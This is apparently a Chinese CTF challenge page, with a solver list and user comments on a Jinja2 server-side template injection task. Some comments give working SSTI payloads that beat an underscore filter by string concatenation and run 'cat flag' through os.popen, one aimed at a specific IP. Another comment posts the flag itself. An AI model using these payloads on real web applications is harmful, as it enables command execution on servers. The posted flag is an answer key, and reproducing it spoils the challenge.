评分(0)
暂无评分
解题动态
sjjf 攻破了该题 5天前
阿宇 攻破了该题 13天前
温吞世俗人间烟火 攻破了该题 16天前
0cu1ux 攻破了该题 20天前
liang123456 攻破了该题 21天前
你不懂的吧 攻破了该题 23天前
syhxxxzxc 攻破了该题 24天前
Chibits 攻破了该题 1月前
dbcjmc 攻破了该题 1月前
tutouqiangqiang 攻破了该题 1月前
凑友希那 攻破了该题 1月前
pure0white0sword 攻破了该题 1月前
luoxu25 攻破了该题 2月前
tcqctf 攻破了该题 2月前
jax123 攻破了该题 2月前
puppyo0o0 攻破了该题 2月前
lipton22 攻破了该题 2月前
HE 攻破了该题 3月前
19957910119 攻破了该题 3月前
评论
nakanodarling 6月前
举报
fenjing
yaozhiwang 1年前
举报
0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}
xiaobai568 1年前
举报
wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html
WCRH 1年前
举报
首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)
单手压FL 1年前
举报
search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
jz1111 1年前
举报
http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}
2728462336 2年前
举报
爆出传参search,利用字符串拼接绕过